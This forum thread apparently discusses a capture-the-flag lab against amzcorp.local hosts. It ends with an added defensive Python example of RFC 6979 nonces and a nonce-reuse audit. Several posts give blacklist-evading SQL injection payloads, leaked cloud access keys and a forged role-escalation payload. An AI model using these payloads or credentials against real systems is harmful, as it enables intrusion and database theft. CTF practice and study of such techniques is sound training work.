Posts: 23 Threads: 0 Joined: N/A
July 27, 2022 at 12:55 AM

(July 26, 2022, 01:16 AM) Peter Wrote: Anyone how sqldump

To do the SQL injection you can use a very simple payload, just remember to bypass the blacklist using camel case. For example:
' UnIoN SeLeCt 1,2,3,4,5-- -
Then you can add your SQL query like this:
' UnIoN SeLeCt @@version,2,3,4,5-- -
A tip here is to use group_concat to dump more than one result. For example, to dump all the database names:
' UnIoN SeLeCt group_concat(schema_name),2,3,4,5 FROM information_schema.schemata#
And so on...

Posts: 32 Threads: 0 Joined: N/A
July 27, 2022 at 12:47 PM

(July 15, 2022, 04:10 PM) hacker1111 Wrote:
  (July 15, 2022, 04:06 PM) fironeDerbert Wrote:
    (July 15, 2022, 03:59 PM) hacker1111 Wrote:
      (July 15, 2022, 03:46 PM) fironeDerbert Wrote: There are creds in the git:
        ecs = boto3.client('ecs',aws_access_key_id="ASIAGCB1NKN8SCJOVP2K",aws_secret_access_key="tOzF/tLK3S3CNsXfj0mjPsIH2iCh5odYHMPDwSVxn7CB5",region_name="eu-east-1",endpoint_url='http://cloud.amzcorp.local')
        You can use them like this:
        apt-get install awscli
        aws configure
        enter the creds
        aws --endpoint-url http://cloud.amzcorp.local ecs help
      These creds are useless. Focus on custom_jwt.py and you can exploit this ecdsa library; it is crypto shit, I'm stuck here. If you are good in crypto then maybe you can find flag 4, and that jwt is created here: http://company-support.amzcorp.local
    The custom_jwt.py is to get the flag 4 or the flag 3?
  flag 4
  flag 3 is in the sql db. Dump the keys_tbl table.

Any progress on flag4?

Posts: 8 Threads: 0 Joined: N/A

(July 16, 2022, 11:09 AM) mceye Wrote:
  (July 16, 2022, 09:34 AM) fironeDerbert Wrote: Any hint to dump the database?
  Line 521 of routes.py (full path dea918ebb439498bf14e448e65ca960883900254/jobs_portal/apps/home/routes.py): there is a function update_user; you can update the user logon to administrator on jobs.amzcorp.local with this.
  Log in as tyler and use his cookies:
  {"username":"mceye","email":"[email protected]","role":"Administrators"}
  then base64:
  {"update_user":"eyJ1c2VybmFtZSI6Im1jZXllIiwiZW1haWwiOiJtY2V5ZUBhbXpjb3JwLmxvY2FsIiwicm9sZSI6IkFkbWluaXN0cmF0b3JzIn0="}
  The search username= parameter is SQL injectable, but it has blacklisted characters and strings: blacklist = ["0x", "**", "ifnull", " or ", "union"]
  Do it manually, like using uppercase.

How did you view the .git repo to find the plaintext code history? I couldn't do this and I tried multiple tools.

Posts: 3 Threads: 0 Joined: N/A
July 28, 2022 at 10:31 AM

(July 14, 2022, 10:31 AM) kaerbannog Wrote: Found: http://jobs.amzcorp.local/api/v4/status
  {
    "site_status": [
      { "site": "amzcorp.local", "status": "OK" },
      { "site": "jobs.amzcorp.local", "status": "OK" },
      { "site": "services.amzcorp.local", "status": "OK" },
      { "site": "cloud.amzcorp.local", "status": "OK" },
      { "site": "inventory.amzcorp.local", "status": "OK" },
      { "site": "workflow.amzcorp.local", "status": "OK" },
      { "site": "company-support.amzcorp.local", "status": "OK" }
    ]
  }
How did you find "/api/v4/status"?

Posts: 0 Threads: 0 Joined: N/A
July 28, 2022 at 10:33 AM

Anyone able to share their list of flags so far?

Posts: 34 Threads: 0 Joined: N/A
July 28, 2022 at 10:40 AM

(July 27, 2022, 12:47 PM) F4nny Wrote:
  Any progress on flag4?

It's about the ECDSA nonce reuse attack, not very difficult. You can pretty much copy any script from the net and modify it a little bit.

Posts: 32 Threads: 0 Joined: N/A

(July 28, 2022, 10:40 AM) philipjphry Wrote:
  It's about the ECDSA nonce reuse attack, not very difficult. You can pretty much copy any script from the net and modify it a little bit.

Can't find the flag4. Reading files or RCE through SSTI raises a 500 error.

Posts: 70 Threads: 0 Joined: N/A

(July 28, 2022, 10:40 AM) philipjphry Wrote:
  It's about the ECDSA nonce reuse attack, not very difficult. You can pretty much copy any script from the net and modify it a little bit.

Thanks for the tip. I will give it a try now.

Posts: 83 Threads: 0 Joined: N/A

(July 28, 2022, 10:40 AM) philipjphry Wrote:
  It's about the ECDSA nonce reuse attack, not very difficult. You can pretty much copy any script from the net and modify it a little bit.

flag 4 is not only about generating a jwt token. Did you get the shell?

Posts: 34 Threads: 0 Joined: N/A
August 1, 2022 at 2:21 PM

(July 30, 2022, 07:40 PM) popex Wrote:
  (July 28, 2022, 10:40 AM) philipjphry Wrote: It's about the ECDSA nonce reuse attack, not very difficult. You can pretty much copy any script from the net and modify it a little bit.
  flag 4 is not only about generating a jwt token. Did you get the shell?

Yeah, I've already completed the whole fortress.
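The flag-4 hints in this thread all come back to ECDSA nonce reuse. As an added example, not code from the thread or from the fortress's custom_jwt.py (which is not shown here), the Python below covers the two defensive sides of that weakness: deriving the nonce deterministically per RFC 6979 with HMAC-SHA256, so the same key can never repeat a nonce across two different messages, and auditing a batch of signatures for a repeated r under one key, which is the observable symptom of reuse. The P-256 group order is the public constant from the standard; the key labels, messages and r values in the signature records are constructed for the demonstration.

```python
"""Added example (not from the thread or from the fortress's custom_jwt.py):
RFC 6979 deterministic ECDSA nonces, plus an audit for nonce reuse.

Assumptions: the P-256 group order (a public constant from the standard) and
SHA-256. The signature records below are constructed for the demonstration.
"""
import hashlib
import hmac
from collections import defaultdict

# Order n of the P-256 base point (FIPS 186-4); public constant, not page data.
P256_ORDER = 0xFFFFFFFF00000000FFFFFFFFFFFFFFFFBCE6FAADA7179E84F3B9CAC2FC632551


def _bits2int(data: bytes, qlen: int) -> int:
    """RFC 6979 s2.3.2: big-endian integer from the leftmost qlen bits."""
    value = int.from_bytes(data, "big")
    blen = len(data) * 8
    return value >> (blen - qlen) if blen > qlen else value


def _int2octets(value: int, rlen: int) -> bytes:
    """RFC 6979 s2.3.3: fixed-length (rlen bytes) big-endian encoding."""
    return value.to_bytes(rlen, "big")


def _bits2octets(data: bytes, q: int, qlen: int, rlen: int) -> bytes:
    """RFC 6979 s2.3.4: bits2int, reduce once modulo q, then int2octets."""
    z1 = _bits2int(data, qlen)
    z2 = z1 - q
    return _int2octets(z1 if z2 < 0 else z2, rlen)


def rfc6979_nonce(private_key: int, message: bytes, q: int = P256_ORDER) -> int:
    """Derive the ECDSA nonce k from (private key, message) with HMAC-SHA256.

    No RNG is involved: the same key and message always give the same k, and
    different messages give different k, so a nonce cannot be reused across
    two distinct messages by accident.
    """
    qlen = q.bit_length()
    rlen = (qlen + 7) // 8
    h1 = hashlib.sha256(message).digest()
    x_bytes = _int2octets(private_key, rlen)
    h_bytes = _bits2octets(h1, q, qlen, rlen)

    def prf(key: bytes, data: bytes) -> bytes:
        return hmac.new(key, data, hashlib.sha256).digest()

    v = b"\x01" * len(h1)
    k = b"\x00" * len(h1)
    k = prf(k, v + b"\x00" + x_bytes + h_bytes)
    v = prf(k, v)
    k = prf(k, v + b"\x01" + x_bytes + h_bytes)
    v = prf(k, v)
    while True:
        t = b""
        while len(t) < rlen:
            v = prf(k, v)
            t += v
        candidate = _bits2int(t, qlen)
        if 1 <= candidate < q:
            return candidate
        # Out-of-range candidate (rare): re-key and draw again, per the RFC.
        k = prf(k, v + b"\x00")
        v = prf(k, v)


# Constructed audit input: key labels, messages and r values are made up.
# Two of key-A's signatures over different messages share r, which only
# happens when the nonce k was reused; re-signing the same message with a
# deterministic nonce legitimately repeats r and must not be flagged.
SAMPLE_SIGNATURES = [
    {"pubkey": "key-A", "msg": "token-1", "r": "0x11aa"},
    {"pubkey": "key-A", "msg": "token-2", "r": "0x11aa"},  # nonce reuse
    {"pubkey": "key-A", "msg": "token-1", "r": "0x11aa"},  # same message again
    {"pubkey": "key-B", "msg": "token-3", "r": "0x22bb"},
    {"pubkey": "key-B", "msg": "token-4", "r": "0x33cc"},
]


def find_reused_nonces(signatures):
    """Return {(pubkey, r): [distinct messages]} for each repeated r under one key.

    r depends only on the nonce, so one key signing two different messages
    with equal r means k was reused and the private key is recoverable.
    """
    groups = defaultdict(set)
    for sig in signatures:
        groups[(sig["pubkey"], sig["r"])].add(sig["msg"])
    return {key: sorted(msgs) for key, msgs in groups.items() if len(msgs) > 1}


if __name__ == "__main__":
    demo_key = 0x12345678  # constructed private key, any value in [1, q-1]
    print(hex(rfc6979_nonce(demo_key, b"message one")))
    print(hex(rfc6979_nonce(demo_key, b"message two")))
    print(find_reused_nonces(SAMPLE_SIGNATURES))
```

The audit keys its groups on (public key, r) and counts distinct messages, so a deterministic signer that re-signs the same payload (and therefore repeats r) is not reported, while two different payloads under one r are. On the signing side, the fix for the class of bug the thread describes is the deterministic derivation itself: a per-signature nonce from a broken or repeated RNG is what makes two signatures share r in the first place.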